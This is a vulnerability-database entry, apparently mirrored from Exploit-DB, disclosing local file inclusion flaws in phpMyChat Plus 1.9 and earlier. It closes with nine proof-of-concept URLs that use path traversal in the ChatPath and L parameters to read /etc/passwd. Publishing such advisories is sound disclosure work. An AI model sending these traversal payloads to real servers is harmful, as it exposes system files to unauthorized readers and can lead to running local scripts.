PHPMyChat Plus 1.9 - Multiple Local File Inclusions

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056043 漏洞类型
发布时间 2006-11-08 更新时间 2006-11-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/28945
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/20972/info

phpMyChat is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

Exploiting these issues may allow an unauthorized user to view files and execute local scripts.

phpMyChat Plus 1.9 and prior versions are vulnerable to these issues; other versions may also be affected.

http://www.example.com/path/avatar.php?ChatPath=../../etc/passwd
http://www.example.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd
http://www.example.com/path/color_popup.php?ChatPath=../../etc/passwd
http://www.example.com/index.php?ChatPath=../../etc/passwd
http://www.example.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd
http://www.example.com/path/avatar.php?ChatPath=../../etc/passwd
http://www.example.com/path/lib/index.lib.php?ChatPath=../../etc/passwd
http://www.example.com/path/logs.php?L=../../etc/passwd
http://www.example.com/path/phpMyChat.php3?ChatPath=../../etc/passwd